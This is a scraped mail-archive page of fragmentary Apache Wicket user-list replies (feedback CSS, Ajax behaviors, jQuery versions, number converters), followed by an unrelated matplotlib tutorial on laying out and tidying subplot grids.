broken in 1.5 relevant... Best regards, Sebastien. On Thu, Nov 1, 2012 at 4:17 PM, Sven Meier s...@meiers.net wrote: If you want to group messages you can easily use multiple feedback panels, each filtering by severity. Sven Sebastien seb...@gmail.com schrieb: Hi, @Alec, unfortunately I think your Re: Quickly Check if a Component Contains Ajax Behaviors Hi, Yes, by using Component#getBehaviors Sebastien. On Thu, Nov 1, 2012 at 6:13 PM, eugenebalt eugeneb...@yahoo.com wrote: Thanks for the answers so far. My latest question is, I need to check if a cfomponent has any Ajax behaviors added to it. For some reason, a Component does not have Re: How to See if a Button Goes To the Server ) to post the form to the server. Be sure your button is of type button. Regards, Sebastien. On Thu, Nov 1, 2012 at 7:30 PM, eugenebalt eugeneb...@yahoo.com wrote: I appreciate the help so far. A somewhat unusual question: We need a way to identify all Buttons which don't go to the server Re: Custom CSS for Feedback message is broken in 1.5 method: getMessageCssClass(message.getLevel()) or something equivalent as we spoke before, so that's fine for me. Well done! Thanks again best regards, Sebastien. On Thu, Nov 1, 2012 at 11:57 PM, Alec Swan alecs...@gmail.com wrote: @Sebastien The scenario you described it exactly the scenario I Re: JQuery update policy I think it is OK to upgrade to 1.8.2 for Wicket 6.3.0 +1 Thanks, Sebastien. On Fri, Nov 2, 2012 at 9:18 AM, Martin Grigorov mgrigo...@apache.orgwrote: Hi Brian, The new Wicket Ajax .js files were implemented and tested with jQuery 1.7.x and that's why we released them with 1.7.2. The only Re: Custom CSS for Feedback message is broken in 1.5 to be done for wicket7 (with the Martin's suggestion for instance). At least I do not see yet any potential issue / unexpected behavior that can happens, and we keep the advantage it provides... Best regards, Sebastien. On Fri, Nov 2, 2012 at 4:21 PM, Alec Swan alecs...@gmail.com wrote: Sebastien Re: Custom CSS for Feedback message is broken in 1.5 Great! Thanks Martin! On Fri, Nov 2, 2012 at 5:01 PM, Martin Grigorov mgrigo...@apache.orgwrote: I'll take care. On Fri, Nov 2, 2012 at 5:59 PM, Sebastien seb...@gmail.com wrote: Hi Alec, If Sven or Martin agree with this solution for 1.5.9 6.3.0, I can attach the patch(es Re: Custom CSS for Feedback message is broken in 1.5 added a comment in the ticket about this, I don't know if you had it)... Thanks again best regards, Sebastien. On Fri, Nov 2, 2012 at 6:08 PM, Martin Grigorov mgrigo...@apache.orgwrote: Done! Please confirm that this is enough for now. On Fri, Nov 2, 2012 at 7:01 PM, Sebastien seb Re: Deleting Cookies Hi, Be sure to use a LoadableDetachableModel Also, maybe you set ListView#*setReuseItems* to true (because the ListView is in a form)? You can set it to false if you have no validation and then you will get fresh data (see ListView javadoc) Hope this helps, Sebastien. On Thu, Dec 6, 2012 at 11 Re: Deleting Cookies ListView with a LDM, and it should be good. If it's still not, maybe the persistence of the cookie update is a little bit slow and IO-async... But I (means myself) could not help in a such case. Best regards, Sebastien. On Thu, Dec 6, 2012 at 11:41 PM, Corbin, James jcor...@iqnavigator.comwrote Re: Deleting Cookies ... Best regards, Sebastien. On Fri, Dec 7, 2012 at 12:28 AM, Corbin, James jcor...@iqnavigator.comwrote: Hi Sebastian, Thanks for your feedback. I wasn't recreating (semantics?) the Listview, I was just refreshing it via ajax so it updates with the model changes. What do you mean by reattach Re: Devoxx France 2013 Hi Cedric, That's definitely an excellent idea to promote Wicket in France! :) If you need help, I am there also! Best regards, Sebastien. On Tue, Jan 8, 2013 at 8:55 PM, Pierre Goupil goupilpie...@gmail.comwrote: Good evening, Maybe three heads are better than two? If you need help, I'm Re: ASK: Updating one wicket page's component from other wicket apps refreshes (or using a AjaxSelfUpdatingTimerBehavior) Hope this helps (a bit) Sebastien. On Mon, Jan 14, 2013 at 12:20 AM, Noven noven_...@yahoo.com wrote: My idea is, first the member's apps have to able to call an admin's wicket page, than post it using atmosphere to update the component from Re: AbstractNumberConverter issue when used with NumberFormat#getCurrencyInstance Oops, sent to dev@ instead of users@, sorry. On Thu, Jan 17, 2013 at 11:50 AM, Sebastien seb...@gmail.com wrote: Dear all, There is an issue when using AbstractNumberConverter when #getNumberFormat returns NumberFormat#getCurrencyInstance() I think the problem is due Re: AbstractNumberConverter issue when used with NumberFormat#getCurrencyInstance (which is equivalent to the code above) locale = Locale.FRANCE; final NumberFormat format = this.getNumberFormat(locale); return this.parse(format, value, locale); Thanks best regards, Sebastien. On Thu, Jan 17, 2013 at 5:22 PM, Sven Meier s...@meiers.net wrote: It seems currency formatting Re: AbstractNumberConverter issue when used with NumberFormat#getCurrencyInstance (with space before currency symbol) Up to you to fix this or not, given the fact there will probably still not works due to the thousand separator java bug... Thanks again, Sebastien. On Thu, Jan 17, 2013 at 5:42 PM, Sven Meier s...@meiers.net wrote: What does your test print for n? Sven Re: AbstractNumberConverter issue when used with NumberFormat#getCurrencyInstance Hi Sven, The JIRA has been created: Thanks best regards, Sebastien. On Thu, Jan 17, 2013 at 5:52 PM, Sebastien seb...@gmail.com wrote: null, lol ! :) Sorry, I read your link too quickly, I did not saw it was talking specifically about Re: [Announce] Introducing Wicked Charts by looking quickly at your sample, I saw you are setting values with a setData() method. Wouldn't be possible to have/use a DataProvider? Thanks best regards, Sebastien. On Sat, Jan 19, 2013 at 11:12 AM, Francois Meillet francois.meil...@gmail.com wrote: Hi Tom, Great work ! Many Thanks Preventing inner form processing? = this.getFormSubmitter(); //!\\ return submitter != null submitter.getForm() == this; } But I do not have any equivalent for #getFormSubmitter()... Any ideas? Thanks in advance, Sebastien. Re: ResizableBehavior multiple resizable panels on a page (# + this.setOutputMarkupId(true).getMarkupId(), options)); Which can be shortened as: add(new ResizableBehavior(JQueryWidget.getSelector(this), options)); Hope this helps, Sebastien. On Sun, Jan 27, 2013 at 5:19 PM, Pieter Claassen pie...@musmato.com wrote: I have multiple panels on a page, each once constructed Re: JQuery - best practice with the current logic behind wicket-jquery-ui, I will do a ResizePanel which will support such event. That's not a big deal, I will look at this tonight... Are you using Wicket 1.5.x or 6.x? Thanks best regards, Sebastien. On Mon, Jan 28, 2013 at 7:45 AM, Pieter Claassen pie...@musmato.com wrote Re: Preventing inner form processing? Hi Martin, Thanks for your answer! I was thinking I did no have a submit button to provide (and that the form was submitted using a div#onclick (wicket 1.5)) But... As I have a submit button, I can supply it in the wicketSubmitFormById method... Thanks again! Sebastien. On Mon, Jan 28, 2013 Re: JQuery - best practice version or settings.setJQueryUIReference(null) //removes jquery ui library this.setJavaScriptLibrarySettings(settings); Hope this helps, Sebastien. On Mon, Jan 28, 2013 at 10:31 AM, Pieter Claassen pie...@musmato.comwrote: Hi Sebastian, Thanks. Wicket 6.5 is what I am using. As to your question Re: JQuery - best practice in that case... Best regards, Sebastien. On Mon, Jan 28, 2013 at 12:58 PM, Martin Grigorov mgrigo...@apache.orgwrote: Hi Pieter, Both Wicket and the libraries which integrate with jQuery UI provide ways to setup custom JavaScriptResourceReference (JSRR) that loads jquery.js. The easiest way Re: JQuery - best practice back to me if you have any questions... Best regards, Sebastien. On Mon, Jan 28, 2013 at 1:19 PM, Sebastien seb...@gmail.com wrote: Hi Pieter, hi Martin, As you are using wicket 6 and wicket-jquery-ui 6, there is no version conflict because wicket-jquery-ui relies on wicket's embedded jquery Re: JQuery - best practice to make both the Component and the Behavior to handle callback, but I would like to be sure it fit Wicket's philosophy. Ernesto, thanks for your input. I would like other inputs on that subject before changing the way the API is designed. Best regards, Sebastien. On Tue, Jan 29, 2013 at 8:09 AM Re: JQuery - best practice your webapp if you need/wish... Feel free to contact me in PM about this. Best regards, Sebastien. On Tue, Jan 29, 2013 at 10:48 AM, Ernesto Reinaldo Barreiro reier...@gmail.com wrote: Hi, On Tue, Jan 29, 2013 at 10:26 AM, Sebastien seb...@gmail.com wrote: Hi Ernesto, Hi Martin, IMHO Re: JQuery - best practice tell me if the new one is good/relevant/wicket-way, I will really appreciate! Best regards to you all, Sebastien. On Wed, Jan 30, 2013 at 4:08 PM, Ernesto Reinaldo Barreiro reier...@gmail.com wrote: Good that you where able to solve your problem! On Wed, Jan 30, 2013 at 3:53 PM, Pieter Claassen Re: JQuery - best practice Hi Martin, Thank you so much! Then, I guess I am ready... All is located here (and sorry for the long preamble): Thanks best regards, Sebastien. On Thu, Jan 31, 2013 at 12:28 AM, Martin Grigorov mgrigo...@apache.orgwrote: Sebastien Re: Icons in CalendarEvent ; /* the size of the image (optional) */ padding-left: 14px; /* the space left for the image display; so the title does not overlap */ } where 'myeventclass' is the css class name you set to the CalendarEvent Hope this helps, Sebastien. On Tue, Feb 12, 2013 at 7:37 PM, grazia grazia.russolass Re: How to null-check manually converted TextField values? , Sebastien. On Wed, Feb 13, 2013 at 4:46 PM, Sebastian Gaul sebast...@mgvmedia.comwrote: I have a TextField which overrides it's getConverter method to add a Joda time converter instead: new TextFieldP(id) { @Override public P IConverterP getConverter(ClassP type) { return Re: [Blog] How to replace component with animation Hi Martin, hi Ernesto, Yes, definitely... I never tried (and even thought about) this but I guess this is an important feature to have! Thank you very much, Ernesto! I look at the code in detail asap :) Best regards, Sebastien. On Fri, Feb 22, 2013 at 1:05 PM, Ernesto Reinaldo Barreiro reier Re: jquery-ui-calendar browser/scrolling problem that... (but there is many...) Adam Shaw, the owner of fullcalendar seems to be highly back on the project after a long freeze period. He will perform a new release will a lot of fixes soon... Thanks best regards, Sebastien. On Thu, Mar 7, 2013 at 8:59 PM
https://www.mail-archive.com/search?l=users@wicket.apache.org&q=from:%22Sebastien%22
CC-MAIN-2020-29
refinedweb
5,538
67.04
Anecdotal evidence suggests that many developers remain skeptical about the value of Entity Beans, especially prior to the EJB 2.0 specification. Many system designers and developers choose not to invest precious resources in a technology that remains unproven in large scale deployments. Transient Entities are session beans that handle interaction with a datastore, generally a relational database. As Transients are only instantiated as needed and exist only for the life of the Session Bean, significant load reductions can be seen. Transient Entities are essentially the architecture enforced when using Microsoft's COM+ model (As COM+ has no Entity BEan equivalent). Two types of transient entity are available for use: Conversational and Non-Conversational. Conversational Transients are modelled on Stateful Session Beans and exist for the lifetime of the client session. Data can therefore be cached in the Transient Entity, reducing the load on the underlying datastore. Conversely, Non-Conversational Transients exist for the lifetime of the method call and therefore no data can be cached in the Entity itself. Non-Conversational Transients are the most efficient and scalable way of handling perisistence in the application server (See Notes). Transient entities typically wrap both business logic and data, in a traditional OO model. However, Transients can be modelled on Entity Beans and be used as 'simple' data entity objects with no included business logic. A typical Transient architecture has the following form : Client -> TransientEntity -> Datastore or this alternative ('pure data' Transient): Client -> BusinessObject -> TransientEntity -> Datastore Sample Code: In this example our Account object is a Non-Conversational Transient Entity. We create an 'AccountModel' for our data (this is essentially the ValueObject pattern for data transfer). This is an immutable object and data is set on creation. public class AccountModel implements Serializable { private String accountID = null private String name = null; private String email = null; public AccountModel(String accountID, String name, String email) { this.accountID= accountID; this.name = name; this.email = email; } ... // create getters for each value ... } We create a remote interface for our EJB. In this case we are using AccountModel to encapsulate data for create and update, but we could explicitly pass the necessary parameters ( or even use either strategy as neeed dictates). public interface IAccount { // standard Transient create-read-update-delete methods public AccountModel create(AccountModel model) throws EJBException; public void delete(String id) throws EJBException; public AccountModel read(String id) throws EJBException; public void update(AccountModel model) throws EJBException; } The exceptions returned should probably be extended to include more applicable and descriptive errors. Now we implement the Session Bean itself. In this model we pass the AccountModel to a factory-based Data Access Object that handles the underlying JDBC implementation. This is similar to the system used by the latest version of Sun's Petstore blueprint application. public class AccountEJB implements SessionBean { public AccountModel create(AccountModel model) throws EJBException { try { IAccountDAO dao = AccountDAOFactory.getDAO(); dao.create(model); } catch(Exception e) { // handle error } } public void delete(String id) throws EJBException {} public AccountModel read(String id) throws EJBException {} public void update(AccountModel model) throws EJBException {} ... // remember to implement SessionBean inherited methods ... } The implementation of the IAccountDAO interface is a Data Access object that handles the database interaction. In this implementation, we are actually using a Stored Procedure with the database to handle the query itself. This keeps messy SQL out of our Java code. public void create(AccountModel model) { CallableStatement stmt = null; ... getDBConnection(); String qry = "Account_Create (?, ?, ?)"; stmt = con.prepareCall("{call " + qry + "}"); stmt.setString(1, model.getID()); stmt.setString(2, model.getName()); stmt.setString(4, model.getEmail()); stmt.executeUpdate(); ... } The use of stored procedures is on of the major benefits of handling peristence manually. Significant performance benefit can be seen from utilising stored procedures effectively, as the database can optimise and cache the execution plan for the SQL statement. The client can then access the AccountEJB, calling the relevant methods as necessary. Conversational Transients: In a Conversational Transient, the AccountEJB would be a Stateful session been and would hold a local instance of the AccountModel. This model then gets reassigned as methods are called. AccountModel model = null; public AccountModel create(AccountModel model) throws EJBException { try { IAccountDAO dao = AccountDAOFactory.getDAO(); dao.create(model); this.model = model; } catch(Exception e) { // handle error } } Care must be used in managing Conversational Transient Entities as there is real danger of corrupting data. One technique is to set flags in the database - in this technique each each data row flag that marks locking and all queries return only when this flag indicates the record is not locked. Other strategies are cedertainly possible. Consequences: Conversational Transients should only be used in cases where the existence of a client session precludes other sesions, applications or systems altering the underlying data. This generally means that when a Conversational Transient is used, some sort of locking mechanism should be in place for the underlying data. Failure to do so will result in possible data corruption as cached data becomes stale and is no longer an accurate reflection of the current state of the underlying database. Transient Entities are not as simple as CMP entity Bean solutions, because all database interaction code must be produced manually. Although this can be reduced to some extent by developing an appropriate reusuable code, in some sitautions CMP Entity Beans are definitely of great benefit and should not be discounted out of hand. In using a Transient architecture, the load on the database can be increased significantly, especially in cases where the majority of data interaction is in read-only scenarios - each read invbolves another database call, where in an Entity Bean scenario, data can be effectively cached in the application server. Notes: When talking about Transients as the most efficient means of handling persistence in the ~application server~ that is exactly what i am talking about - the application server itself. Entity Beans obviously increase the demand on the application server. In a Transient architecture this demand is pushed to the database, and the load on the database is therefore increased significantly. That said, RDBMS systems have had over 20 years to refine the strategies for handling large numbers of concurrent transactions. This fact can be utilised in developing a large scale system by relying more heavily on the database to handle persistience. The ability to seperate the physical database application server further increases the power of this type of model. COM+ exhibits the ability to scale at least as well as similar EJB solutions without using Entity Beans, so the model is definitely workable. Transient Entity (18 messages) Threaded Messages (18) - Transient Entity by David Churchville on August 19 2001 15:46 EDT - Transient Entity by David Churchville on August 19 2001 15:52 EDT - Transient Entity by Cameron Purdy on August 20 2001 17:08 EDT - Transient Entity by Toby Hede on August 23 2001 20:09 EDT - Anecdotes by Cameron Purdy on August 23 2001 09:35 EDT - Roll-your-own Entity Beans by phil bradley on September 04 2001 02:57 EDT - Anecdotes by Jesse Beaumont on September 26 2002 08:04 EDT - Transient Entity by N K on August 31 2001 09:40 EDT - Transient Entity by Nick Minutello on August 31 2001 08:16 EDT - Transient Entity by Yi Lin on September 06 2001 03:37 EDT - Transient Entity by Cameron Purdy on September 07 2001 11:33 EDT - Transient Entity by John Harby on December 10 2001 09:58 EST - Transient Entity by amitabh gupta on October 11 2001 09:46 EDT - Entity Beans by simon wenham on September 20 2001 11:41 EDT - Transient Entity by Roman Stepanenko on August 21 2001 13:48 EDT - Transient Entity by Toby Hede on August 21 2001 20:29 EDT - Transient Entity by Roman Stepanenko on August 22 2001 01:37 EDT - Transient Entity by John Carbone on May 02 2002 19:22 EDT Transient Entity[ Go to top ] I like this pattern, and it makes sense for those not opting to use CMP beans in a read-mostly application. - Posted by: David Churchville - Posted on: August 19 2001 15:46 EDT - in response to Toby Hede Only issue, it doesn't support caching of frequently accessed data, which I almost always have to do. One strategy to use with this pattern is: Implement caching layer using Business Delegate. Use a Java class to wrap access to a session bean that returns read-mostly data. Let the Java class cache results after first calling the session bean, and return cached data otherwise. If used in a Servlet/Web context, this Java class can be stored as an application object for "global" data, or in the session context for user-specific data. Transient Entity[ Go to top ] I should have specified this strategy applies to the "non conversational" verison of your pattern. The conversational version supports caching, naturally. - Posted by: David Churchville - Posted on: August 19 2001 15:52 EDT - in response to David Churchville Another thing I noticed, you don't actually mention queries here, just CRUD data access. I assumed (maybe incorrectly) that you would add query methods to the Transient objects? That's the whole basis for my caching discussion, not the caching of individual entities, but of collections. Transient Entity[ Go to top ] Toby: "Anecdotal evidence suggests that many developers remain skeptical about the value of Entity Beans, especially prior to the EJB 2.0 specification. Many system designers and developers choose not to invest precious resources in a technology that remains unproven in large scale deployments." - Posted by: Cameron Purdy - Posted on: August 20 2001 17:08 EDT - in response to Toby Hede I am not sure where you collect anecdotal evidence, but I can assure you that it is fundamentally invalid. Most of the companies that I have worked or spoken with over the past year have based their transactional data models in their new J2EE applications entirely on entity EJBs. These include, for example, most of the major financial institutions on the east coast and several of the largest in Europe. I do not wish to discourage you from developing high performance patterns for EJB development. I simply encourage you to avoid prefixing your thoughts (and thus devaluing them) with irrelevant statements. Peace, Cameron. Transient Entity[ Go to top ] I find amusing, to say the least, that you counter my anecdotal evidence with anecdotal evidence of your own. - Posted by: Toby Hede - Posted on: August 23 2001 20:09 EDT - in response to Cameron Purdy Joking aside, many of the discussions on this very site have revolved around alternatives to Entity Beans. Some of the reports I read from JavaOne, concurred that the general trend seemed away from Entity Beans, including this report from IBM: "A practical tidbit that was commonly spouted by a number of different speakers was that real performance came only in minimizing (if not outright banning) the use of Entity beans. Ah, what a difference a year makes!" () And for a recent example of a discussion on the server side: As well, in my travels as a developer I have have talked with any number of people, and there is a significant number suggesting that Entity Beans need serious consideration. I swear my anecodtal evidence has to be as good as yours! Anecdotes[ Go to top ] I find amusing, to say the least, that you counter my - Posted by: Cameron Purdy - Posted on: August 23 2001 21:35 EDT - in response to Toby Hede > anecdotal evidence with anecdotal evidence of your own. Yes, yes, but at least they aren't analogies. That would be more like the pot calling the kettle black. ;-) I've heard a lot of concerns about entity beans. These concerns usually fall into two categories: 1) My entity beans are slow, how do I speed them up? 2) I've never written an entity bean nor used one nor seen one but I think that they are slow. I'm going to do (x, y or z) instead because it is faster. Question number two is a bit odd IMHO, and falls into the same category of comparing the speed of Java with C++, arguing if Macs are better than PCs, or arguing if Unix is better than Windows. Of course a Mac running Java on Unix is fast, Macs are supercomputers after all. I do like question number one. The answer to question number one is sometimes that the EJBs are being used where they are arguably inappropriate, for example for set-oriented database access used in page construction, or in reporting. Entity EJBs excel at serving as a transactional data model, which means as the target of business operations, they work well. Entity EJBs are worst at set-based operations, particular with object-to-object navigation. Even with optimizations (such as Gene Chuang's fat-key), if a second operation is done across an optimized iteration, the result becomes O(n^2) instead of O(n). For example: for each EJB in home.find() invoke EJB.method() which goes to a related entity (e.g. getting vendor names from a vendor ejb for each selected stock item ejb) The fat-key optimization on 1,000 EJBs results in a total of one select on the first EJB (e.g. stock items) but then up to 1,000 selects will occur as vendor names are loaded using the vendor id foreign key in the stock item. You can only make the EJBs so non-granular (in this case, denormalized), for example using a join to load the vendor name as part of the stock item, but each time you employ this optimization, you increase the cost of using the EJB in every case in order to optimize some set of uses. You also increase your chance of having stale data within a tx because you have data on an EJB which is not responsible for its being updated. As a result, for reporting or massive page-gen purposes, both of which are almost always non-transactional in nature, it makes sense to use mechanisms other than an entity EJB as the means for database access. Early optimization is the root of all evil. I've found that developing entirely with an entity EJB data access layer then optimizing read-only operations works pretty well. First of all it validates and fleshes out the data model design relatively quickly. Secondly, it insulates the app code from db changes because I know what has to get updated when parts of the db change. Lastly, it works early on, and it typically does not work slowly in development (i.e. a single user hitting a local database). The difficult choices in optimization are typically found in one of two categories: 1) Read-only access, typically to build a response page, that hits a handful of EJBs but could be done several times as optimally with direct JDBC etc. These are hard calls because they are borderline -- not too expensive, but certainly worse than they could be. 2) Large transactional operations, particularly ones that you know will grow as the data volume in the application grows. Often these are batch-like or periodic processes. Take the stock item / vendor concept as one type of problem ... if that type of object navigation must occur on a large number of EJBs in a single transaction, it is a real resource hog. These types of transactions are rare in most applications, and deserve special care in optimization. If possible, just comment out the use of the tx data model (EJBs) and do as much work as possible on the db side in a few set-oriented SQL DML statements. Leave the EJB code as documentation that describes how the object model is affected. I have discussed several potential solutions with EJB developers, but the problem is how can the EJB developer or container implementor (for CMP) predict what data needs to be prefetched? In other words, how can 1,000 ejbFindByPk calls be optimized in advance into a single select? Is that something the EJB developer needs to code? Declare? Is it something the container needs to guess? Use AI to figure out? If this particular question could be answered, entity EJBs in read-only uses could be as fast as custom O/R approaches. You know the ones that I'm referring to. In summary, there are issues with entity EJBs that are a grey area for the performance question. That doesn't make entity EJBs any more evil than any other technology -- each has (or at least most seem to have) a purpose in life. I would have designed the entity EJB specification much differently than "they" did, but hey, they didn't bother to ask any of us now did they? ;-) So let's look for the good in this particular pile. BTW - I wasn't trying to say that your optimization idea was bad. I think it is pretty cool that you are working to figure out faster / better ways of getting data, with or without using entity EJBs. I just didn't want people to accumulate one more unchallenged anecdote that led them to believe that entity EJBs were unusable, slow, despised by all developers and a complete failure. Peace, Cameron. Roll-your-own Entity Beans[ Go to top ] I mostly agree with Cameron's post. - Posted by: phil bradley - Posted on: September 04 2001 02:57 EDT - in response to Cameron Purdy A couple of additional points. Your Transient beans look to me like your own version of entity beans without the good bits. You admit it can't handle concurrency, and must implement your own explicit locks - not nice! Entity beans were introduced as a safe OO persistence mechanism and to support shared access to data. Nothing about support for queries! One common problem is that people confuse persistence with data access. Most queries are not a persistent operations and hence should not be performed thru entity beans. (Isolation issues ignored!) Entity beans are widely used, not withstanding the limitations of some vendors implementations, because they are safe and scalable. No hard to debug JDBC code! Guaranteed concurrency and transactionally safe. BTW, the Optimisation - Rule 1, Don't do it, Rule 2, if you must do it, then don't do it yet' Is a quote from Michael Jackson, the British systems Guru. Phil Bradley Anecdotes[ Go to top ] Being new to the world of EJBs we are currently starting a new project which will involve the collection data in XML format to be processed in batch as well as a set of online screens for direct data entry. The plan is for the two to share the same business layer in order to minimise the maintenance costs. - Posted by: Jesse Beaumont - Posted on: September 26 2002 08:04 EDT - in response to Cameron Purdy Because of the inefficiencies of making multiple distinct calls to EJBs due to the JNDI lookup resolution, the plan is to make the EJBs fairly rough grained so they can handle large datasets if necessary but be scaled down to a single transaction as well. Based on your post regarding the relative pros and cons of Entity beans do you think there is a way to make entity beans perform this sort of dual role resonably efficiently. My current thinking is no, though I have had only very little time to experiment with them and probably, due to time constraints wont have that time. Jesse Transient Entity[ Go to top ]. - Posted by: N K - Posted on: August 31 2001 09:40 EDT - in response to Toby Hede Transient Entity[ Go to top ] Posted by N K 2001-08-31 08:40:55.0. - Posted by: Nick Minutello - Posted on: August 31 2001 20:16 EDT - in response to N K . ... which is fine. However, it is not the point of the previous argument that Cameron was presenting. The point is to use entity beans where they make sense. If a particular "entity" is not going to be a performance bottle-neck - make it an entity bean. It is *usually* quite a bit quicker to code a CMP bean than to implement a BMP bean - or its java-classes-wrapping-jdbc solution. It is certainly far more flexible and a lot easier to maintain. If the access to the data is transactional, again look very hard at making it an entity. If it is largely read-only (and it is a result-set, page generation data access) AND the perfomance has proven to be an issue having *already* tried entity beans, then look at using stateless session beans and JDBC. The big point is to follow the 3 steps in optimisation (this is patently a stolen quote;): 1) Dont do it 2) Dont do it yet 3) Now that you have waited and are sure you have no choice, try one last time to talk youself out of it. Maintainability of code (read: simplicity) is far more important than performance. An interesting observation: + A lot of IBM consultants are proponents of this JDBC-wrapped classes, using session beans as a facade pattern. + IBM Websphere has been regularly complained about for poor entity bean performance. I wonder which is the cause and which is the effect - which is the chicken/egg if you like? Transient Entity[ Go to top ] What's new in this "pattern"? Isn't this essentially the old straightforward way that everyone was doing before there is entity bean? - Writing your DB access code to get data into Java (or C++...) object so you can used it. What's new about it? Am I missing something? - Posted by: Yi Lin - Posted on: September 06 2001 15:37 EDT - in response to N K > Posted by N K 2001-08-31 08:40:55.0. >. OK, but why? Is that because no one in your institution really understands entity bean and ever used it? Maybe your team is missing out something very productive. I am a supporter of entity bean because: 1. Entity bean (the entire app business as well) is NOT only about performance. It is also about "not reinventing the wheel" and productivity (I don't know about you, but I hate writing time-consuming and boring JDBC/SQL code). If performance is the only important thing, why aren't we still write tight fast assembly code today? 2. Entity bean can be optimized, either by better app server implemention and configuration. After all, reading data from memory (bean) is faster than from DB. (I admit for a particular server using certain configuration, it can cause EJB to load data from DB on every call, it nullifies entity bean advantage. Also EJB does not support fast bulk data retrieval.) To me, entity bean is one generation ahead of this "pattern" and ahead of COM+ as well in this aspect. Transient Entity[ Go to top ] The "ML on the east coast Websphere project without entities" is only one of many Java projects at ML. AFAIK Most new Java projects at ML are targeted at Weblogic, since ML chose Weblogic as its standard enterprise application platform. It's not surprising that an old Websphere project would NOT use entity beans, since Websphere barely (or "almost", or "kind of") supported CMP 1.0, for example. - Posted by: Cameron Purdy - Posted on: September 07 2001 11:33 EDT - in response to Yi Lin Transient Entity[ Go to top ] It would be interesting to see some hard statistics on this issue. The world is too large for arguments based on such small sample spaces. - Posted by: John Harby - Posted on: December 10 2001 21:58 EST - in response to Cameron Purdy Transient Entity[ Go to top ] Yi Lin - Posted by: amitabh gupta - Posted on: October 11 2001 21:46 EDT - in response to Yi Lin If u don't agree with somebody's view, that does not give u the right to trash him/her. Doing so only gives a bad impression about yourself. As regards to Entity Beans, there can be many real life situations where using Entity Beans provides no advantage. One of them is clustering. In a clustered environment, the App server does not cache the bean and reads it afresh from database everytime it is accessed, and as such you lose a big advantage of entity beans. Cameron admits that entity beans are not good where relational data needs to be accessed. Most real life applications will have entity beans that are related to a collection of other entity beans. Simple example is custmer to orders, and orders to line-items. If EBs cannot be used even in such a simple example, where else can they be ? I think EBs are an overhyped patterns, that are popular among people who hate to interact with Database or write a SQL, and prefer the entity bean to do that for them, magically. But behind the covers, entity bean does the same stuff but in a very ugly fashion, since it accesses the databse in a generic way as against your own SQL which would do precisely what you want to do. Toby has a good point, and it should not be rejected as views of people who don't know EBs. There is nothing difficult abt implementing EBs, especially if u r already comfortable with their less costly cousins, the session beans. But because you have a tool, u don't have to use it. Its use must be justified too. Thanks Entity Beans[ Go to top ] We, reluctantly, used them to comply with the J2EE standards, as recommended by the consultants we employed. - Posted by: simon wenham - Posted on: September 20 2001 11:41 EDT - in response to Cameron Purdy Our data is mainly client account specific so there is no need to cache the data between sessions. We have to maintain a history of the transactional data so we only perform queries and inserts so the use of entity EJB's was definitely a sledgehammer to crack a nut. I am a great believer in horses for courses and not a purist so I think we used the wrong technology for this particular application. Transient Entity[ Go to top ] Your solution is not transactional. You can add tx behavior but that would make really ugly implementation and effectively you will repeat functionality of ejb container (in a very buggy manner). That's why people use entity beans. - Posted by: Roman Stepanenko - Posted on: August 21 2001 13:48 EDT - in response to Toby Hede Transient Entity[ Go to top ] When I deply my Transient Entity, I simply declare the methods as Transaction Required in the deployment descriptor. In JBoss (my app server of choice), at least, this lets the container manage the transactions. I have tested this with several techinques including nested calls across multiple methods and the transactions do work. - Posted by: Toby Hede - Posted on: August 21 2001 20:29 EDT - in response to Roman Stepanenko Transient Entity[ Go to top ] When I mean transactional I not only mean propagation. If there is an exception during saving the state, then your objects will not be refreshed automatically. You will have to provide the code which will be buggy and unreliable. - Posted by: Roman Stepanenko - Posted on: August 22 2001 13:37 EDT - in response to Toby Hede Transient Entity[ Go to top ] I would like to see some studies with imperical evidence - Posted by: John Carbone - Posted on: May 02 2002 19:22 EDT - in response to Toby Hede as oppopsed to anecdotal. Are there any of these out there?
http://www.theserverside.com/discussions/thread.tss?thread_id=8536
CC-MAIN-2016-07
refinedweb
4,602
51.07
Provided by: manpages-dev_3.35-0.1ubuntu1_all NAME wcstombs - convert a wide-character string to a multibyte string SYNOPSIS #include <stdlib.h> size_t wcstombs(char *dest, const wchar_t *src, size_t n); DESCRIPTION If dest is not a NULL pointer,, converted, (size_t) -1 is returned. CONFORMING TO C99. NOTES The behavior of wcstombs() depends on the LC_CTYPE category of the current locale. The function wcsrtombs(3) provides a thread safe interface to the same functionality. SEE ALSO mbstowcs(3), wcsrtombs(3) COLOPHON This page is part of release 3.35 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at- pages/.
http://manpages.ubuntu.com/manpages/precise/man3/wcstombs.3.html
CC-MAIN-2019-47
refinedweb
110
60.41
Subplots Tips and Tricks Typically, one of your first steps that when you’re doing data viz in matplotlib is to make a blank canvas to draw on. This of course returns a Figure object and an Axis object. %pylab inline fig, ax = plt.subplots() Populating the interactive namespace from numpy and matplotlib And if you’re interested in making multiple plots together in the same figure, you pass in nRows and nCols arguments. To instead make the second return argument an array of Axis objects. fig, axes = plt.subplots(1, 2, figsize=(10, 4)) However, this can get unwieldy when dealing with a large number of rows and columns– not only from an aesthetic standpoint, but also from a “How do I put my visualization into the cell I want?” fig, axes = plt.subplots(10, 10) Our Data We have a .csv on hand that looks at the distribution of where letters occur in popular English words. It’s got a column for each letter and 15 rows of data. import pandas as pd df = pd.read_csv('../data/letterDists.csv') df.head() 5 rows × 26 columns Iterating Through Each Figure Conceptually, we want to simultaneously iterate through each column of data and through each of our axes making a plot for each step along the way. Simultaneous iteration should set off the zip alarm in your head, and by using the axes.flatten() method, we don’t have to go through the hastle of nested for loops to deal with a variable number of rows and columns in our figure. fig, axes = plt.subplots(5, 6, figsize=(16, 8)) for col, ax in zip(df.columns, axes.flatten()): ax.bar(df.index, df[col]) ax.set_title(col) Spacing Out But this is pretty cluttered. Thankfully, we can use the subplots_adjust function to tune the layout of each subplot. Specifically, we’re going to modify the wspace and hspace arguments, which are defined in the docs as the amount of (height/width) reserved for space between subplots, expressed as a fraction of the average axis (height/width) The size of the subplots themselves will scale to fill the other n% of the height/width, automatically. fig, axes = plt.subplots(5, 6, figsize=(16, 8)) for col, ax in zip(df.columns, axes.flatten()): ax.bar(df.index, df[col]) ax.set_title(col) plt.subplots_adjust(wspace=.5, hspace=.5) Cleaning Up Remainder Finally, we made a 5x6 figure because 26 doesn’t divide evently into a 5x5 or a 4x6. However, as a result, those last 4 cells detract from the rest of the figures. We can manually delete them using the fig.delaxes() function, and manually specifying what cells to delete. fig, axes = plt.subplots(5, 6, figsize=(16, 8)) for col, ax in zip(df.columns, axes.flatten()): ax.bar(df.index, df[col]) ax.set_title(col) plt.subplots_adjust(wspace=.5, hspace=.5) 